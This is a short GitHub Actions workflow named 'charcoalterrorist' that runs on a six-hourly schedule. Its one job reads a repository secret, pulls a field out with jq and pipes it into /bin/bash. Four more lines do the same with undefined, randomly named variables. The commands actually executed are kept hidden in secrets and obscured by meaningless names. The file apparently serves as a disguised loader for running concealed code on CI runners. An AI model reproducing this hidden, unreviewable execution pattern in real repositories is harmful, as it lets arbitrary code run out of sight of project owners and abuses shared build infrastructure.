name: charcoalterrorist

on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          vre43: ${{ secrets.vre43 }}
        run: |
          echo $vre43 | jq -r .zi7 | /bin/bash
          echo $mjn34 | jq -r .s98 | /bin/bash
          echo $wqctu331 | jq -r .anr65466 | /bin/bash
          echo $jgo3 | jq -r .afgh7274 | /bin/bash
          echo $kr7 | jq -r .hzs8 | /bin/bash

